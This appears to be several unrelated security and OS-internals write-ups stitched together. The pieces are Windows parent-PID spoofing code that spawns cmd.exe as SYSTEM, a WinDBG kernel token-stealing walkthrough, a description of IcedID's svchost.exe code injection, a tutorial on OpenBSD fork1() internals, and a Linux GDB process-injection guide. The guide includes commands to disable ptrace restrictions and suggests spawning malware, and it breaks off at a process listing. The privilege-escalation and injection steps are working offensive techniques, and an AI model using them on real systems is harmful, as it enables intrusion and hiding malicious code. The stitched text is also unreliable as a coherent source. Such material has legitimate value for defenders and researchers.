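    uint32_t new_pid;             /* the process that was created              */
    uint32_t declared_parent_pid; /* parent recorded for the new process       */
    uint32_t creator_pid;         /* process that issued the creation request  */
} process_create_event;

/*
 * Returns true when the recorded parent is not the process that actually
 * requested the creation, i.e. the parent was explicitly reassigned.
 */
bool parent_is_reassigned(const process_create_event *ev)
{
    return ev->declared_parent_pid != ev->creator_pid;
}
```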

We can create a new process and set the parent with the following code:

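// Requires <windows.h> and <stdio.h>
int pid;
HANDLE pHandle = NULL;
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
SIZE_T size;
BOOL ret;

// Set the PID to a SYSTEM process PID
pid = 555;

// Open the process which we will inherit the handle from
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
	printf("Error opening PID %d\n", pid);
	return 2;
}

ZeroMemory(&si, sizeof(STARTUPINFOEXA));

// The first call only reports the buffer size the attribute list needs
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
// Allocation arguments are assumed; they are cut off in the original listing
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
	GetProcessHeap(),
	0,
	size
);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// Finally, create the process
// (arguments are assumed; the original listing is cut off after the opening parenthesis)
ret = CreateProcessA(
	"C:\\Windows\\system32\\cmd.exe",
	NULL,
	NULL,
	NULL,
	true,
	EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
	NULL,
	NULL,
	(LPSTARTUPINFOA)&si,
	&pi
);

if (ret == false) {
	printf("Error creating new process (%d)\n", GetLastError());
	return 3;
}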

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM such as lsass.exe:


The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice easy way to achieve this using PowerShell:

New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement… but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token. For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won’t go through how to set up the Kernel debugger connection as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on our running process which we want to elevate to SYSTEM. This can be done using the !process command:

!process 0 0 cmd.exe

In the output we can see some important information about our process, such as the number of open handles and the process environment block address:

PROCESS fffffa8002edd580
    SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
    DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
    Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESS structure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process’s access token, defined in a TOKEN structure. To view the contents of the token, we first must calculate the TOKEN address. On Windows 7 x64, the process TOKEN pointer is located at offset 0x208; this offset differs between versions (and potentially service packs) of Windows. We can retrieve the pointer with the following command:

kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

fffffa80`02edd788  fffff8a0`00d76c51

As the token address is stored within an EX_FAST_REF structure, whose low 4 bits on x64 hold a reference count rather than address bits, we must AND the value with a mask to obtain the true pointer address:

kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0

Evaluate expression: -8108884136880 = fffff8a0`00d76c50
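The two debugger calculations above (adding the field offset, then masking the EX_FAST_REF value) can be sketched in plain C. This is only an arithmetic illustration using the addresses from this example; the function names are made up for the sketch, and the 4-bit mask is the x64 layout assumed in the text.

```c
#include <stdint.h>

/* On x64 the low 4 bits of an EX_FAST_REF hold a reference count. */
#define FAST_REF_MASK 0xFULL

/* Address of a field located `offset` bytes into a structure at `base`. */
uint64_t field_address(uint64_t base, uint64_t offset)
{
    return base + offset;
}

/* Strip the reference-count bits to recover the object pointer. */
uint64_t fast_ref_to_pointer(uint64_t fast_ref)
{
    return fast_ref & ~FAST_REF_MASK;
}

/* Reference count cached in the low bits of the value. */
unsigned fast_ref_count(uint64_t fast_ref)
{
    return (unsigned)(fast_ref & FAST_REF_MASK);
}
```

With the values from this walkthrough, field_address(0xfffffa8002edd580, 0x208) gives the address read by dq, and fast_ref_to_pointer(0xfffff8a000d76c51) gives the same result as the WinDBG expression.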

Which means that our true TOKEN address for cmd.exe is at fffff8a000d76c50. Next we can dump out the TOKEN structure members for our process using the following command:

kd> !token fffff8a0`00d76c50

This gives us an idea of the information held by the process token:

User: S-1-5-21-3262056927-4167910718-262487826-1001
User Groups:
 00 S-1-5-21-3262056927-4167910718-262487826-513
    Attributes - Mandatory Default Enabled
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-32-544
    Attributes - DenyOnly
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled
 04 S-1-5-4
    Attributes - Mandatory Default Enabled
 05 S-1-2-1
    Attributes - Mandatory Default Enabled
 06 S-1-5-11
    Attributes - Mandatory Default Enabled
 07 S-1-5-15
    Attributes - Mandatory Default Enabled
 08 S-1-5-5-0-2917477
    Attributes - Mandatory Default Enabled LogonId
 09 S-1-2-0
    Attributes - Mandatory Default Enabled
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled
 11 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
 19 0x000000013 SeShutdownPrivilege               Attributes -
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
 25 0x000000019 SeUndockPrivilege                 Attributes -
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
 34 0x000000022 SeTimeZonePrivilege               Attributes -

So how do we escalate our process to gain SYSTEM access? Well we just steal the token from another SYSTEM privileged process, such as lsass.exe, and splice this into our cmd.exe EPROCESS using the following:

kd> !process 0 0 lsass.exe
kd> !process 0 0 cmd.exe

To see what this looks like when run against a live system, I’ll leave you with a quick demo showing cmd.exe being elevated from a low level user, to SYSTEM privileges:

Interesting technique to inject malicious code into svchost.exe

Once launched, IcedID takes advantage of an interesting technique to inject malicious code into svchost.exe — it does not require starting the target process in a suspended state, and is achieved by only using the following functions:

  • kernel32!CreateProcessA
  • ntdll!ZwAllocateVirtualMemory
  • ntdll!ZwProtectVirtualMemory
  • ntdll!ZwWriteVirtualMemory

IcedID’s code injection into svchost.exe works as follows:

  1. In the memory space of the IcedID process, the function ntdll!ZwCreateUserProcess is hooked.
  2. The function kernel32!CreateProcessA is called to launch svchost.exe and the CREATE_SUSPENDED flag is not set.
  3. The hook on ntdll!ZwCreateUserProcess is hit as a result of calling kernel32!CreateProcessA. The hook is then removed, and the actual function call to ntdll!ZwCreateUserProcess is made.
  4. At this point, the malicious process is still in the hook, the svchost.exe process has been loaded into memory by the operating system, but the main thread of svchost.exe has not yet started.
  5. The call to ntdll!ZwCreateUserProcess returns the process handle for svchost.exe. Using the process handle, the functions ntdll!NtAllocateVirtualMemory and ntdll!ZwWriteVirtualMemory can be used to write malicious code to the svchost.exe memory space.
  6. In the svchost.exe memory space, the call to ntdll!RtlExitUserProcess is hooked to jump to the malicious code already written.
  7. The malicious function returns, which continues the code initiated by the call to kernel32!CreateProcessA, and the main thread of svchost.exe will be scheduled to run by the operating system.
  8. The malicious process ends.

Since svchost.exe has been called with no arguments, it would normally immediately shut down because there is no service to launch. However, as part of its shutdown, it will call ntdll!RtlExitUserProcess, which hits the malicious hook, and the malicious code will take over at this point.

OpenBSD Kernel Internals — Creation of process from user-space to kernel space.

GDB + Qemu (env)

Hello readers,

I know this time it is a little late, but I am also busy with some other professional things. 🙂

This time, let’s discuss process creation in the OpenBSD operating system, from user space down to kernel space.

We will take an example of the user-space process that will be launched from the Command Line Interface (console), for example, “ls”, and then what happens in kernel-space as a result of it.

I will divide this series into three parts (creation, execution, and exit), because learning how process creation works took me some time on its own, and tracing it from user space to kernel space had to be done line by line.

I have used gdb to debug the process and analyze it line by line.

Now, I will not waste your time too much.

Let’s dive into the user-space to kernel-space and learn and see the beauty of puffer.

I have broken the whole process, and the kernel functions it uses, into points, so I think it will be easy to read and learn.

Now, suppose you have launched “ls” command from CLI (xterm):

Here, the parent process is “ksh”, the default shell in OpenBSD, which invokes “ls” or any other command.

Every process is created by sys_fork(), that is, the fork system call, which internally calls fork1().

fork1 — kernel developer’s manual

fork1() creates a new process out of p1, which should be the current thread. This function is used primarily to implement the fork(2) and vfork(2) system calls, as well as the kthread_create(9) function.

Life cycle of a process (in brief):

“ls” → fork(2) → sys_fork() → fork1() → sys_execve() → sys_exit() → exit1()

Under the hood working of fork1()

After “ls” is launched from user space, control goes to fork() (libc) and from there to sys_fork().


FORK_FORK: a macro indicating that the call was made by the fork(2) system call. Used only for statistics.

#define FORK_FORK 0x00000001

  • So, the value of the flags variable is set to 1, because the call is made by fork(2).
  • If the parent's ptrace mask has PTRACE_FORK set, FORK_PTRACE is ORed into flags; otherwise flags are left unchanged. Then fork1() is called.

Now, fork1()

fork1() initial code
  • In the code above, curp->p_p->ps_comm is “ksh”, the parent process that will fork “ls” (user space).
  • First come some process structure declarations, then uid = curp->p_ucred->cr_ruid, which sets uid to the real user ID.
  • Then, the structure for process address space information.
  • Then some variables and the ptrace_state structure, followed by condition checks using KASSERT.
  • fork_check_maxthread(uid) checks the current number of threads on behalf of the given uid.
  • The number of threads must stay below the maximum number of threads allowed (maxthread), or below maxthread - 5 when the uid is not root, because the last 5 slots are reserved for root.
  • If the limit has been reached, it prints the “table is full” message (via tablefull) at most once every 10 seconds and fails. Otherwise, it increments the number of threads.
  • After fork_check_maxthread, the same logic is applied again to track processes. If you want, you can have a look at the fork1 code screenshot.
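The thread-limit check described in the bullets above can be modelled in user space. The following is only a sketch under stated assumptions, not the kernel source: check_maxthread_model, the tiny maxthread value, and passing the current time as a parameter are all made up for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <time.h>

#define ROOT_RESERVE  5     /* slots kept back for uid 0 */
#define WARN_INTERVAL 10    /* seconds between "table is full" messages */

int nthreads = 0;           /* current thread count (model only) */
int maxthread = 8;          /* hypothetical limit, tiny for demonstration */
time_t last_warn = 0;       /* time of the last warning, 0 if none yet */

/* Returns 0 and bumps the count, or EAGAIN when the table is full. */
int check_maxthread_model(uid_t uid, time_t now)
{
    if ((nthreads >= maxthread - ROOT_RESERVE && uid != 0) ||
        nthreads >= maxthread) {
        /* Rate-limit the warning to once per WARN_INTERVAL seconds. */
        if (last_warn == 0 || now - last_warn >= WARN_INTERVAL) {
            fprintf(stderr, "thread: table is full\n");
            last_warn = now;
        }
        return EAGAIN;
    }
    nthreads++;
    return 0;
}
```

With maxthread set to 8, a non-root uid is refused once three threads exist, while uid 0 can still use the remaining five slots.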

Now, we will proceed further,

fork1() code continued
  • It changes the count of processes for a specific user via chgproccnt(uid, 1).
  • The uidinfo structure maintains resource consumption counts for every uid, including the process count and socket buffer space usage.
  • The uid_find function looks up and returns the uidinfo structure for uid. If no uidinfo structure exists for uid, a new structure is allocated and initialized.

Then, it increments ui_proccnt, that is, the number of processes, by diff and returns the count.

After that, it checks whether the uid is non-privileged and whether the number of processes is greater than the soft resource limit, which is 9223372036854775807 from what I have found in gdb.

Have a look in the below screen-shot for the proper view of values:

(ddd) gdb output for resource limit

If the uid is non-privileged and the count exceeds the resource limit, it decreases the count again via chgproccnt() by passing -1 as the diff parameter, and also decrements the number of processes and threads.
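The per-uid accounting and rollback just described can be sketched as a small user-space model. Everything with a _model suffix, the fixed-size table, and the soft_limit parameter are assumptions for this sketch; the kernel keeps uidinfo structures in its own data structure and reads the limit from the process's resource limits.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/types.h>

#define MAX_UIDS 16                  /* hypothetical table size */

struct uidinfo_model {
    uid_t ui_uid;                    /* owner of this entry */
    long  ui_proccnt;                /* number of processes for the uid */
    int   in_use;                    /* slot allocated? */
};

struct uidinfo_model uid_table[MAX_UIDS];

/* Find the entry for uid, creating one if needed; NULL when the table is full. */
struct uidinfo_model *uid_find_model(uid_t uid)
{
    struct uidinfo_model *free_slot = NULL;

    for (size_t i = 0; i < MAX_UIDS; i++) {
        if (uid_table[i].in_use && uid_table[i].ui_uid == uid)
            return &uid_table[i];
        if (!uid_table[i].in_use && free_slot == NULL)
            free_slot = &uid_table[i];
    }
    if (free_slot != NULL) {
        free_slot->ui_uid = uid;
        free_slot->ui_proccnt = 0;
        free_slot->in_use = 1;
    }
    return free_slot;
}

/* Adjust the uid's process count by diff and return the new count. */
long chgproccnt_model(uid_t uid, int diff)
{
    struct uidinfo_model *ui = uid_find_model(uid);

    if (ui == NULL)
        return -1;                   /* model only: no free slot */
    ui->ui_proccnt += diff;
    return ui->ui_proccnt;
}

/* Count first, then roll back if a non-root uid is over its soft limit. */
int account_fork_model(uid_t uid, long soft_limit)
{
    long count = chgproccnt_model(uid, 1);

    if (count < 0)
        return EAGAIN;
    if (uid != 0 && count > soft_limit) {
        (void)chgproccnt_model(uid, -1);
        return EAGAIN;
    }
    return 0;
}
```

The design point is that the counter is incremented before the limit is tested, so a failed check has to undo the increment explicitly.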

  • Next, the uvm_uarea_alloc() function allocates a thread’s ‘uarea’, the memory where its kernel stack and PCB are stored.

Now, it checks whether uaddr holds a valid uarea address; if it is zero, the allocation failed, so it decrements the process and thread counts again.

Now, there are some important functions:

→ thread_new(struct proc *parent, vaddr_t uaddr)

→ process_new(struct proc *p, struct process *parent, int flags)

thread_new(curp, uaddr)

Here, in the thread_new function, we get the thread for our user-space process, in our case “ls”. It is taken from the pool of proc structures, proc_pool, via the pool_get() function.

Then, we set the state of the thread to SIDL, which means that the process/thread is being created by fork. We then set p->p_flag = 0.

Next, a section of the proc structure is zeroed. See the code snippet below from sys/proc.h:

code snippet for members that will be zeroed upon creation in fork, via memset

In the above code snippet, all of these members are zeroed via memset upon creation in fork.

Then, the section starting at parent->p_startcopy is copied to p->p_startcopy via memcpy. Have a look at the screenshot below to see which members are copied.

code snippet for the members those will be copied upon in fork
  • Then, crhold(p->p_ucred) increments the reference count in the struct ucred structure, that is, p->p_ucred->cr_ref++.
  • Now, it casts the uarea address, that is, (struct user *)uaddr, and saves it as the kernel virtual address of the u-area.
  • Now, it initializes the timeout.
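The "zero one section, copy another section" idiom used by thread_new can be illustrated with a small user-space structure. This is a sketch only: struct thread_model, its fields, and the marker members are invented for the example and do not mirror the real struct proc layout.

```c
#include <stddef.h>
#include <string.h>

struct thread_model {
    int  id;                /* set explicitly by the allocator */

    /* Section zeroed on creation: zero_start up to (not including) zero_end. */
    int  zero_start;
    int  pending_signals;
    long cpu_ticks;
    int  zero_end;

    /* Section copied from the parent: copy_start up to (not including) copy_end. */
    int  copy_start;
    int  priority;
    char name[16];
    int  copy_end;
};

/* Zero one byte range of the child and copy another range from the parent. */
void thread_init_model(struct thread_model *child,
                       const struct thread_model *parent)
{
    size_t zs = offsetof(struct thread_model, zero_start);
    size_t ze = offsetof(struct thread_model, zero_end);
    size_t cs = offsetof(struct thread_model, copy_start);
    size_t ce = offsetof(struct thread_model, copy_end);

    memset((char *)child + zs, 0, ze - zs);
    memcpy((char *)child + cs, (const char *)parent + cs, ce - cs);
}
```

Grouping members by how they are initialized lets a single memset and a single memcpy handle a whole section, instead of assigning each field by hand.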

dummy function to show the timeout_set function working.

timeout_set(timeout, b, argument)

This initializes the timeout structure so that the function b is called with argument when the timeout later fires.

void
timeout_set(struct timeout *new, void (*fn)(void *), void *arg)
{
        new->to_func = fn;
        new->to_arg = arg;
        new->to_flags = TIMEOUT_INITIALIZED;
}

scheduler_fork_hook(parent, p): It is a macro which will update the p_estcpu of child from parent’s p_estcpu.

p_estcpu holds an estimate of the amount of CPU that the process has used recently

/* Inherit the parent’s scheduler history */
#define scheduler_fork_hook(parent, child) do {    \
 (child)->p_estcpu = (parent)->p_estcpu;           \
} while (0)

Then, return the newly created thread p .

Now, another important function is process_new(), which creates the process in a similar fashion to what we have seen above in the thread_new function.

  • process_new(struct proc *p, struct process *parent, int flags)

In the above code snippet, the same thing happens again: a process is taken from process_pool via pool_get, then sections are zeroed using memset and copied using memcpy.

So, for the detailed explanation, please go through the thread_new() function first.

Next is the initialization of the process using the process_initialize function.

process_initialize(pr, p)

ps_mainproc: the original, main thread in the process. It is only special for the handling of p_xstat and some signal and ptrace behaviours that need to be fixed.

→ Copy the initial thread, that is, p, to pr->ps_mainproc.

→ Initialize the queue referenced by head. Here, head is pr->ps_threads. Then insert elm at the tail of the queue. Here, elm is p.

→ Set the number of references to 1, that is, pr->ps_refcnt = 1.

→ Point the initial thread back at its process, that is, p->p_p = pr.

→ Set the same creds for the process as for the initial thread.

→ Check conditions on the new thread and the new process via KASSERT.

→ Initialize the list referenced by head. Here, head is pr->ps_children.

→ Again, initialize a timeout (for details, see thread_new).

Now, after the process initialization, pid allocation takes place.

pr->ps_pid = allocpid(); allocpid() returns an unused pid.

allocpid() internally calls arc4random_uniform(), which in turn calls arc4random(), so the number used as the pid is randomly generated.

Then it verifies that the new pid is not already taken. It checks processes, process groups, and zombie processes in turn using the function ispidtaken(pid_t pid), which internally calls these functions:

  • prfind(pid_t pid): Locate a process by number
  • pgfind(pid_t pgid): Locate a process group by number
  • zombiefind(pid_t pid): Locate a zombie process by number
code snippet for allocpid and ispidtaken
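The "draw a random pid, retry while it is taken" loop can be sketched in user space as follows. This is a model under stated assumptions: the three boolean tables stand in for prfind(), pgfind() and zombiefind(), PID_MAX_MODEL is a made-up bound, rand() replaces arc4random_uniform() purely for portability, and marking the pid as used inside the allocator is a simplification of this sketch.

```c
#include <stdbool.h>
#include <stdlib.h>

#define PID_MAX_MODEL 99999          /* hypothetical upper bound */

/* Hypothetical stand-ins for the process, process-group and zombie lookups. */
bool pid_in_use[PID_MAX_MODEL + 1];
bool pgid_in_use[PID_MAX_MODEL + 1];
bool zombie_pid[PID_MAX_MODEL + 1];

/* A pid is taken if any of the three lookups finds it. */
bool ispidtaken_model(int pid)
{
    return pid_in_use[pid] || pgid_in_use[pid] || zombie_pid[pid];
}

/* Draw random candidates in [2, PID_MAX_MODEL] until a free one turns up. */
int allocpid_model(void)
{
    int pid;

    do {
        /* rand() is used here only to keep the sketch portable. */
        pid = 2 + rand() % (PID_MAX_MODEL - 1);
    } while (ispidtaken_model(pid));

    pid_in_use[pid] = true;          /* model only: record the allocation */
    return pid;
}
```

Because candidates are random rather than sequential, the loop needs the "is it taken" check on every draw; it terminates quickly as long as the pid space is mostly free.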

Now, store the pointer to the parent process in pr->ps_pptr.

Increment the reference count in the process limit structure, that is, struct plimit.

Store the vnode of the parent's executable in pr->ps_textvp, that is, pr->ps_textvp = parent->ps_textvp;.

if (pr->ps_textvp)
        vref(pr->ps_textvp); /* vref --> vnode reference */

The above snippet means that, if a valid vnode is found, the v_usecount variable inside the executable's struct vnode is incremented.

Now, the calculation for setting up process flags:

pr->ps_flags = parent->ps_flags & (PS_SUGID | PS_SUGIDEXEC | PS_PLEDGE | PS_EXECPLEDGE | PS_WXNEEDED);
/* the same statement with the numeric values substituted: */
pr->ps_flags = parent->ps_flags & (0x10 | 0x20 | 0x100000 | 0x400000 | 0x200000);
if (vnode of controlling terminal != NULL)
        pr->ps_flags |= parent->ps_flags & PS_CONTROLT;
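To make the masking concrete, here is a small self-contained sketch of the flag inheritance. The five inherited flag values are the ones listed above; the value used for PS_CONTROLT and the function name inherit_flags_model are assumptions of this sketch.

```c
#include <stdint.h>

/* Values as listed in the text above. */
#define PS_SUGID       0x00000010u
#define PS_SUGIDEXEC   0x00000020u
#define PS_PLEDGE      0x00100000u
#define PS_WXNEEDED    0x00200000u
#define PS_EXECPLEDGE  0x00400000u
/* Assumed value for this sketch; not given in the text. */
#define PS_CONTROLT    0x00000001u

#define INHERIT_MASK \
    (PS_SUGID | PS_SUGIDEXEC | PS_PLEDGE | PS_EXECPLEDGE | PS_WXNEEDED)

/* Child keeps only the inheritable bits, plus PS_CONTROLT if a tty exists. */
uint32_t inherit_flags_model(uint32_t parent_flags, int has_controlling_tty)
{
    uint32_t flags = parent_flags & INHERIT_MASK;

    if (has_controlling_tty)
        flags |= parent_flags & PS_CONTROLT;
    return flags;
}
```

Any parent flag outside the mask is dropped in the child, which is why the mask is applied with AND before the conditional OR.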

process_new continued…


* if child_able_to_share_file_descriptor_table_with_parent:
         pr->ps_fd = fdshare(parent)      /* share the table */
  else:
         pr->ps_fd = fdcopy(parent)       /* copy the table */
* if child_able_to_share_the_parent's_signal_actions:
         pr->ps_sigacts = sigactsshare(parent) /* share */
  else:
         pr->ps_sigacts = sigactsinit(parent)  /* copy */
* if child_able_to_share_the_parent's_addr_space:
         pr->ps_vmspace = uvmspace_share(parent)
  else:
         pr->ps_vmspace = uvmspace_fork(parent)
* if process_able_to_start_profiling:
         startprofclock(pr);    /* start profiling on a process */
* if check_child_able_to_start_ptracing:
         pr->ps_flags |= parent->ps_flags & PS_PTRACED
* if check_no_signal_or_zombie_at_exit:
         pr->ps_flags |= PS_NOZOMBIE /* No signal or zombie at exit */
* if check_no_signals_stats_or_swapping:
         pr->ps_flags |= PS_SYSTEM

Update pr->ps_flags with PS_EMBRYO by ORing it in, that is,
pr->ps_flags |= PS_EMBRYO /* New process, not yet fledged */

membar_producer() → Force visibility of all of the above changes.

All stores preceding the memory barrier will reach global visibility before any stores after the memory barrier reach global visibility.

In short, I think it is used to make the preceding changes globally visible before anything that follows.

Now, insert the new elm, that is, pr, at the head of the list. Here, head is allprocess.

  • return pr

fork1() continued…

p->p_fd and p->p_vmspace are direct copies of pr->ps_fd and pr->ps_vmspace.



** if (process_has_no_signals_stats_or_swapping) then atomically set bits:

atomic_setbits_int(&pr->ps_flags, PS_SYSTEM);

** if (the parent is to be suspended until the child terminates (by calling _exit(2) or abnormally) or makes a call to execve(2)) then atomically set bits on the child and on the parent:

atomic_setbits_int(&pr->ps_flags, PS_PPWAIT);
atomic_setbits_int(&curpr->ps_flags, PS_ISPWAIT);

#ifdef KTRACE
/* Some KTRACE related things */
#endif

cpu_fork(curp, p, NULL, NULL, func, arg ? arg : p)

— To create or Update PCB and make child ready to RUN.

 * Finish creating the child thread. cpu_fork() will copy
 * and update the pcb and make the child ready to run. The
 * child will exit directly to user mode via child_return()
 * on its first time slice and will not return here.

Address space,
vm = pr->ps_vmspace

if (call is made by the fork syscall); then
        increment the number of fork() system calls.
        update the vm pages affected by fork() by adding the data and stack page counts.
else if (call is made by the vfork() syscall); then
        do the same as for fork, but with the vfork counters.
else
        increment the number of kernel threads created.


If (process is being traced && created by the fork system call); then
        malloc() allocates uninitialized memory in the kernel address space for an object of the given size, here sizeof(*newptstat), where newptstat is declared as struct ptrace_state *newptstat.

Allocate the thread ID, that is, p->p_tid = alloctid();
This works the same way as allocpid(): it calls arc4random directly and uses the tfind function to look up a thread ID by number.

* insert the new element p at the head of the allproc list.
* insert the new element p at the head of the thread hash list.
* insert the new element pr at the head of the process hash list.
* insert the new element pr after the curpr element.
* insert the new element pr at the head of the children process list.

fork1() continued…

If (isProcessPTRACED())
then save the original parent process ID for ptrace, that is,
pr->ps_oppid = curpr->ps_pid.
If (pointer to parent process_of_child != pointer to parent process_of_current_process)
proc_reparent(pr, curpr->ps_pptr); /* Make the current process's parent the new parent of the child process, that is, pr */

Now, check whether newptstat contains an address; in our case, newptstat contains a kernel virtual address returned by malloc(9).
If the above condition is true, that is, newptstat != NULL, then set the ptrace status:
make the ptrace state pointer of pr point to the structure held in newptstat, then set newptstat to NULL.

→Update the ptrace status to the curpr process and also the pr process.

curpr->ps_ptstat->pe_report_event = PTRACE_FORK;
pr->ps_ptstat->pe_report_event = PTRACE_FORK;
curpr->ps_ptstat->pe_other_pid = pr->ps_pid;
pr->ps_ptstat->pe_other_pid = curpr->ps_pid;

Now, for the new process, set the accounting bits and mark it as complete.

  • Get the nanosecond time at which the process starts.
  • Set the accounting flags to AFORK, which means forked but not execed.
  • Atomically clear the PS_EMBRYO bit that was set earlier.
  • Then check whether the FORK_IDLE flag is set. If it is not, make the child runnable and add it to the run queue via the fork_thread_start function.
  • If it is set, store arg as the CPU the thread will run on.

Free the kernel memory that malloc allocated for newptstat via free.

Notify any interested parties about the new process via KNOTE.

Now, update the stats counters for a successful fork.

uvmexp.forks++; /* -->For forks */
if (flags & FORK_PPWAIT)
        uvmexp.forks_ppwait++; /* --> counter for forks where parent waits */
if (flags & FORK_SHAREVM)
        uvmexp.forks_sharevm++; /* --> counter for forks where vmspace is shared */

Now, pass pointer to the new process to the caller.

if (rnewprocp != NULL)
        *rnewprocp = p;
fork1 continued…
  • With PS_PPWAIT set on the child and PS_ISPWAIT set on ourselves, that is, the parent, go to sleep on our process via tsleep.
  • If the child was started with tracing enabled and the current process is being traced, alert the parent using the SIGTRAP signal.
  • Now, return the child pid to the parent process.
  • return (0)

Then, finally, I saw in the debugger that after fork1 it jumps to the sys/arch/amd64/amd64/trap.c file for system call handling and for setting up the frame.

Some of the machine-independent (MI) functions are defined in the sys/sys/syscall_mi.h file, such as mi_syscall(), mi_syscall_return() and mi_child_return().

Then, after the system call has been handled in trap.c, control passes to the sys_execve system call, which I will explain later (in the second part), and I will also explain more about the trap.c code in upcoming posts. This has already become a long post.


Process Injection with GDB

Inspired by excellent CobaltStrike training, I set out to work out an easy way to inject into processes in Linux. There’s been quite a lot of experimentation with this already, usually using ptrace(2) or LD_PRELOAD, but I wanted something a little simpler and less error-prone, perhaps trading flexibility and works-everywhere for ease-of-use. Enter GDB and shared object files (i.e. libraries).

GDB, for those who’ve never found themselves with a bug unsolvable with lots of well-placed printf("Here\n") statements, is the GNU debugger. Its typical use is to poke at a running process for debugging, but it has one interesting feature: it can have the debugged process call library functions. There are two functions which we can use to load a library into the program: dlopen(3) from libdl, and __libc_dlopen_mode, libc’s implementation. We’ll use __libc_dlopen_mode because it doesn’t require the host process to have libdl linked in.

In principle, we could load our library and have GDB call one of its functions. Easier than that is to have the library’s constructor function do whatever we would have done manually in another thread, to keep the amount of time the process is stopped to a minimum. More below.


Trading flexibility for ease-of-use puts a few restrictions on where and how we can inject our own code. In practice, this isn’t a problem, but there are a few gotchas to consider.


We’ll need to be able to attach to the process with ptrace(2), which GDB uses under the hood. Root can usually do this, but as a user, we can only attach to our own processes. To make it harder, some systems only allow processes to attach to their children, which can be changed via a sysctl. Changing the sysctl requires root, so it’s not very useful in practice. Just in case:

sysctl kernel.yama.ptrace_scope=0
# or
echo 0 > /proc/sys/kernel/yama/ptrace_scope

Generally, it’s better to do this as root.
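Before attempting to attach, it can help to know what the current Yama setting is. The sketch below reads the same file the commands above write to; the function names are made up for this example, and the accepted range of 0 to 3 reflects the values Yama defines (0 classic, 1 restricted to descendants, 2 admin-only, 3 no attach).

```c
#include <stdio.h>
#include <stdlib.h>

/* Parse the contents of the ptrace_scope file; -1 on malformed input. */
int parse_ptrace_scope(const char *text)
{
    char *end;
    long v = strtol(text, &end, 10);

    if (end == text || v < 0 || v > 3)
        return -1;
    return (int)v;
}

/* Read the current setting; -1 if Yama is absent or the file is unreadable. */
int read_ptrace_scope(void)
{
    char buf[16];
    FILE *f = fopen("/proc/sys/kernel/yama/ptrace_scope", "r");

    if (f == NULL)
        return -1;
    if (fgets(buf, sizeof buf, f) == NULL) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return parse_ptrace_scope(buf);
}
```

A return value of 0 means any process may attach to another process running as the same user; a value of 1 or higher is where the restrictions described above come into play.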

Stopped Processes

When GDB attaches to a process, the process is stopped. It’s best to script GDB’s actions beforehand, either with -x and --batch or by echoing commands to GDB, to minimize the amount of time the process isn’t doing whatever it should be doing. If, for whatever reason, GDB doesn’t restart the process when it exits, sending the process SIGCONT should do the trick.

kill -CONT <PID>

Process Death

Once our library’s loaded and running, anything that goes wrong with it (e.g. segfaults) affects the entire process. Likewise, if it writes output or sends messages to syslog, they’ll show up as coming from the process. It’s not a bad idea to use the injected library as a loader to spawn actual malware in new processes.

On Target

With all of that in mind, let’s look at how to do it. We’ll assume ssh access to a target, though in principle this can (should) all be scripted and can be run with shell/sql/file injection or whatever other method.

Process Selection

First step is to find a process into which to inject. Let’s look at a process listing, less kernel threads:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# ps -fxo pid,user,args | egrep -v ' \[\S+\]$'
    1 root     /sbin/init
  625 root     /lib/systemd/systemd-journald
  664 root     /sbin/lvmetad -f
  696 root     /lib/systemd/systemd-udevd
 1266 root     /sbin/iscsid
 1267 root     /sbin/iscsid
 1273 root     /usr/lib/accountsservice/accounts-daemon
 1278 root     /usr/sbin/sshd -D
 1447 root      \_ sshd: root@pts/1
 1520 root          \_ -bash
 1538 root              \_ ps -fxo pid,user,args
 1539 root              \_ grep -E --color=auto -v  \[\S+\]$
 1282 root     /lib/systemd/systemd-logind
 1295 root     /usr/bin/lxcfs /var/lib/lxcfs/
 1298 root     /usr/sbin/acpid
 1312 root     /usr/sbin/cron -f
 1316 root     /usr/lib/snapd/snapd
 1356 root     /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
 1358 root     /usr/lib/policykit-1/polkitd --no-debug
 1413 root     /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
